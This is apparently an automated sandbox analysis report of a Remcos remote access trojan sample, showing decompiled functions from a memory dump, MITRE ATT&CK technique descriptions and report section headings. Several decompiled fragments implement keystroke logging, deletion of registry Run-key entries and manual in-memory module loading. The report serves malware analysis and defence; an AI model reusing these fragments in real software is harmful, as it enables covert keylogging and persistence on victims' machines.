				return E004318FB(_v8 ^ _t18);
			}

0x00444755
0x00444756
0x0044475d
0x00444777
0x0044477e
0x0044478f
0x00444780
0x00444785
0x0044478b
0x0044478b
0x004447a3

APIs

TlsAlloc.KERNEL32 ref: 0044478F

Strings

FlsAlloc, xrefs: 0044476B
<@, xrefs: 00444785

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: <@$FlsAlloc
API String ID: 2773662609-1200716068
Opcode ID: 95008ba7aed6845a399d3d146e004e300dd954b4a79b4395e584fb9cefbbf8b3
Instruction ID: a03641a02393d7144beaed60c3c9b2ec50360191d388f91bcef4af42b99e89ef
Opcode Fuzzy Hash: 95008ba7aed6845a399d3d146e004e300dd954b4a79b4395e584fb9cefbbf8b3
Instruction Fuzzy Hash: C6E02B31B40728B7D710AF659C02B7EBB94DB85B12F10016FFC056B281DE785D1686DE

Uniqueness

Uniqueness Score: -1.00%

Function 004447A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 004447E5

Strings

<@, xrefs: 004447DB
FlsFree, xrefs: 004447C1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Free
String ID: <@$FlsFree
API String ID: 3978063606-2527383359
Opcode ID: 03e64d94a1019cb8f01fbd53ca50404284767660a552e3d6d9fd484fbd3f94fb
Instruction ID: d70316ebbfe4f62d5dedbde804438ee27b77cce19bbe96e4b34e1e21de68f81b
Opcode Fuzzy Hash: 03e64d94a1019cb8f01fbd53ca50404284767660a552e3d6d9fd484fbd3f94fb
Instruction Fuzzy Hash: EDE0E571B41628A79700AF659C02F3EBB90EB85B12F21026AFD065B252DE785E1186DE

Uniqueness

Uniqueness Score: -1.00%

Function 00444997 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,004373F7), ref: 004449D6

Strings

GetSystemTimePreciseAsFileTime, xrefs: 004449B2
<@, xrefs: 004449CC

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: <@$GetSystemTimePreciseAsFileTime
API String ID: 2086374402-3234813070
Opcode ID: d86e73fade0fedddba97489606abd00f44805e3cc363166d7215167f12b865c9
Instruction ID: db134fc43c64735efce5039f29b62c255ca085f1708cd52405b4b811e3820cdb
Opcode Fuzzy Hash: d86e73fade0fedddba97489606abd00f44805e3cc363166d7215167f12b865c9
Instruction Fuzzy Hash: 60E0E5B1B40718B79710AF69AC02F3EBB90DB84B06F11016BFC065B242E9784D1096DE

Uniqueness

Uniqueness Score: -1.00%

Function 00409D2E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00409D2E(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;

				_t7 = __ebx;
				_t13 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402053(_t7, _t10, _t12, _t14);
						return E00408D3B(_t13);
					}
				}
				return _t4;
			}

0x00409d2e
0x00409d31
0x00409d39
0x00409d3f
0x00409d44
0x00409d5a
0x00409d5f
0x00409d61
0x00000000
0x00409d61
0x00409d46
0x00409d46
0x00409d49
0x00409d4e
0x00409d50
0x00409d66
0x00409d66
0x00000000
0x00409d6d
0x00409d49
0x00409d73

APIs

GetKeyState.USER32(00000012), ref: 00409D33

Strings

[CtrlR], xrefs: 00409D50
[CtrlL], xrefs: 00409D61

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 96430967ff6791703fc71616f897d242453a5eb43dca73e56abae2454b004537
Instruction ID: 60b82ade85f9f0c9d907b96aa118b9fee2490ba2c59ae13f80f1a9f6bedd625f
Opcode Fuzzy Hash: 96430967ff6791703fc71616f897d242453a5eb43dca73e56abae2454b004537
Instruction Fuzzy Hash: C3E0862178032057C524353E561AB6A69108F92764F50016FE5836B6D7E9AE8D0103CF

Uniqueness

Uniqueness Score: -1.00%

Function 00410F97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00410F97(void* __ecx, short* __edx, short* _a4) {
				void* _v8;
				signed int _t6;

				_push(__ecx);
				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
					_t6 = RegDeleteValueW(_v8, _a4);
					asm("sbb al, al");
					return  ~_t6 + 1;
				}
				return 0;
			}

0x00410f9a
0x00410fad
0x00410fb9
0x00410fc1
0x00000000
0x00410fc3
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046E588,80000002,80000002,0040AF7A,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00410FA5
RegDeleteValueW.ADVAPI32(0046E588,?,?,0046E5A0,pth_unenc,0046E588), ref: 00410FB9

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410FA3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 1c697e77fcc3fc031c276effbbc6f1ce7b912ade538c6ce889a9df8ca18215b9
Instruction ID: a4514a5ca1b1a686f81940c5fce8398d9c2f0d8bc315c523277aeb7f1c81b387
Opcode Fuzzy Hash: 1c697e77fcc3fc031c276effbbc6f1ce7b912ade538c6ce889a9df8ca18215b9
Instruction Fuzzy Hash: 53E0CD31144308BBDF104F70DD07FFA772CD741F41F104155790556091D765D9855665

Uniqueness

Uniqueness Score: -1.00%

Function 00439FF5 Relevance: 5.1, APIs: 4, Instructions: 139
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00439FF5(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E004370F7(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00439941())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00439941())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00445A9C(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00439941())) = 0x16;
					return E0043862C() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x00439ff5
0x00439ffe
0x0043a003
0x0043a006
0x0043a00a
0x0043a019
0x0043a01c
0x0043a03c
0x0043a041
0x0043a044
0x0043a046
0x0043a114
0x0043a11a
0x0043a12f
0x0043a13b
0x0043a141
0x0043a143
0x0043a152
0x0043a152
0x0043a152
0x0043a155
0x0043a155
0x0043a159
0x0043a15b
0x0043a15e
0x0043a15e
0x0043a15e
0x0043a15e
0x00000000
0x0043a165
0x0043a14a
0x00000000
0x0043a14a
0x0043a11c
0x0043a11f
0x0043a122
0x0043a122
0x0043a124
0x0043a125
0x0043a125
0x0043a129
0x00000000
0x0043a129
0x0043a04c
0x0043a052
0x0043a07f
0x0043a08b
0x0043a091
0x0043a093
0x00000000
0x00000000
0x0043a099
0x0043a09f
0x0043a0a2
0x0043a0fe
0x0043a103
0x0043a10b
0x00000000
0x0043a10b
0x0043a0a4
0x0043a0a7
0x0043a0a9
0x0043a0ac
0x0043a0ae
0x0043a0b0
0x0043a0e6
0x0043a0f4
0x0043a0fa
0x0043a0fc
0x0043a110
0x00000000
0x0043a110
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a0b2
0x0043a0b2
0x0043a0b2
0x0043a0b5
0x0043a0b8
0x0043a0ba
0x00000000
0x00000000
0x0043a0c4
0x0043a0cb
0x0043a0ce
0x0043a0d0
0x0043a0d8
0x0043a0d8
0x0043a0db
0x0043a0dc
0x0043a0df
0x0043a0e1
0x00000000
0x00000000
0x00000000
0x0043a0e1
0x0043a0d2
0x0043a0d3
0x0043a0d6
0x00000000
0x00000000
0x00000000
0x0043a0d6
0x0043a0e3
0x00000000
0x0043a0e3
0x0043a054
0x0043a056
0x00000000
0x00000000
0x0043a05c
0x0043a05f
0x0043a063
0x0043a066
0x0043a06a
0x00000000
0x00000000
0x0043a070
0x0043a071
0x0043a074
0x0043a076
0x00000000
0x00000000
0x00000000
0x0043a078
0x00000000
0x0043a05f
0x0043a023
0x00000000
0x0043a02e
0x0043a010
0x0043a016
0x00000000
0x0043a016
0x0043a16d

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D15), ref: 0043A08B
GetLastError.KERNEL32 ref: 0043A099
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043A0F4

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 979b351a470de255499920bc498553a5aff160e65fa3e4c93c730b9e117bb1c4
Instruction ID: 724f22024815ecd3ad7f06be5c7c16fd3ad86f8434a374eae2bff1d91779ba82
Opcode Fuzzy Hash: 979b351a470de255499920bc498553a5aff160e65fa3e4c93c730b9e117bb1c4
Instruction Fuzzy Hash: 0A411831644241AFCF258F65C844BBB7BB4AF09324F14916EF8D59B3A1DB398C21CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6E9 Relevance: 5.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040F6E9(intOrPtr* __ecx) {
				signed short* _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t45;
				signed short _t46;
				signed int _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				int _t52;
				void* _t55;
				void* _t57;
				intOrPtr _t63;
				void _t66;
				signed short* _t67;
				intOrPtr* _t68;
				intOrPtr _t72;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t79;

				_t79 =  &_v12;
				_t76 = __ecx;
				_t75 = 1;
				_t33 =  *__ecx;
				_t77 =  *((intOrPtr*)(__ecx + 4));
				_v8 = _t77;
				if( *((intOrPtr*)(_t33 + 0x84)) != 0) {
					_t55 =  *((intOrPtr*)(_t33 + 0x80)) + _t77;
					if(IsBadReadPtr(_t55, 0x14) == 0) {
						_t57 = _t55 + 0x10;
						while(1) {
							L3:
							_t36 =  *((intOrPtr*)(_t57 - 4));
							if(_t36 == 0) {
								goto L24;
							}
							_t78 =  *((intOrPtr*)(_t76 + 0x24))(_t36 + _t77,  *((intOrPtr*)(_t76 + 0x34)));
							if(_t78 == 0) {
								SetLastError(0x7e);
								goto L23;
							} else {
								_push(4 +  *(_t76 + 0xc) * 4);
								_push( *((intOrPtr*)(_t76 + 8)));
								_t63 = E0043A271();
								if(_t63 == 0) {
									 *((intOrPtr*)(_t76 + 0x2c))(_t78,  *((intOrPtr*)(_t76 + 0x34)));
									SetLastError(0xe);
									L23:
									_t75 = 0;
								} else {
									 *((intOrPtr*)(_t76 + 8)) = _t63;
									 *((intOrPtr*)(_t63 +  *(_t76 + 0xc) * 4)) = _t78;
									 *(_t76 + 0xc) =  *(_t76 + 0xc) + 1;
									_t66 =  *(_t57 - 0x10);
									if(_t66 == 0) {
										_t66 =  *_t57;
									}
									_t72 = _v8;
									_t45 =  *_t57 + _t72;
									_t67 = _t66 + _t72;
									while(1) {
										_v4 = _t67;
										_v12 = _t45;
										if( *_t67 == 0) {
											break;
										}
										_t46 =  *_t67;
										_push( *((intOrPtr*)(_t76 + 0x34)));
										if(_t46 >= 0) {
											_t47 = _t46 + _t72 + 2;
										} else {
											_t47 = _t46 & 0x0000ffff;
										}
										_t48 =  *((intOrPtr*)(_t76 + 0x28))(_t78, _t47);
										_t68 = _v12;
										_t79 = _t79 + 0xc;
										 *_t68 = _t48;
										_t49 = _t68;
										if( *_t49 == 0) {
											_t75 = 0;
										} else {
											_t72 = _v8;
											_t67 =  &(_v4[2]);
											_t45 = _t49 + 4;
											continue;
										}
										L17:
										if(_t75 == 0) {
											 *((intOrPtr*)(_t76 + 0x2c))(_t78,  *((intOrPtr*)(_t76 + 0x34)));
											SetLastError(0x7f);
										} else {
											_t57 = _t57 + 0x14;
											_t52 = IsBadReadPtr(_t57 - 0x10, 0x14);
											_t77 = _v8;
											if(_t52 == 0) {
												goto L3;
											} else {
											}
										}
										goto L24;
									}
									goto L17;
								}
							}
							goto L24;
						}
					}
					L24:
				}
				return _t75;
			}

0x0040f6e9
0x0040f6ee
0x0040f6f3
0x0040f6f4
0x0040f6f6
0x0040f6f9
0x0040f704
0x0040f713
0x0040f71e
0x0040f724
0x0040f727
0x0040f727
0x0040f727
0x0040f72c
0x00000000
0x00000000
0x0040f73b
0x0040f741
0x0040f811
0x00000000
0x0040f747
0x0040f751
0x0040f752
0x0040f75c
0x0040f760
0x0040f806
0x0040f811
0x0040f811
0x0040f817
0x0040f766
0x0040f769
0x0040f76c
0x0040f76f
0x0040f772
0x0040f777
0x0040f779
0x0040f779
0x0040f77d
0x0040f781
0x0040f783
0x0040f7bd
0x0040f7c0
0x0040f7c4
0x0040f7c8
0x00000000
0x00000000
0x0040f787
0x0040f789
0x0040f78e
0x0040f798
0x0040f790
0x0040f790
0x0040f790
0x0040f79c
0x0040f79f
0x0040f7a3
0x0040f7a6
0x0040f7a8
0x0040f7ad
0x0040f7cc
0x0040f7af
0x0040f7b3
0x0040f7b7
0x0040f7ba
0x00000000
0x0040f7ba
0x0040f7ce
0x0040f7d0
0x0040f7f3
0x0040f7fa
0x0040f7d2
0x0040f7d2
0x0040f7db
0x0040f7e1
0x0040f7e7
0x00000000
0x00000000
0x0040f7ed
0x0040f7e7
0x00000000
0x0040f7d0
0x00000000
0x0040f7ca
0x0040f760
0x00000000
0x0040f741
0x0040f727
0x0040f819
0x0040f819
0x0040f822

APIs

IsBadReadPtr.KERNEL32(?,00000014,?,00000000,00000001,00000000,?,?,0040FA70), ref: 0040F716
IsBadReadPtr.KERNEL32(?,00000014), ref: 0040F7DB
SetLastError.KERNEL32(0000007F), ref: 0040F7FA
SetLastError.KERNEL32(0000007E,0040FA70), ref: 0040F811

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 41927517fe79c20d62399e2833468fb46731434c0eaf9f59769fbab8c422a671
Instruction ID: 751db440692cd81c3dc0d8ee5a9cf1c65008f0e1f0839a977d1301680840af56
Opcode Fuzzy Hash: 41927517fe79c20d62399e2833468fb46731434c0eaf9f59769fbab8c422a671
Instruction Fuzzy Hash: 3F41AC762043019FD7249F28EC44B27B7E8FB84714F14843EE946DBB91E739E809CA5A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kyFBQxVbsg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qerdo.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kyFBQxVbsg.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

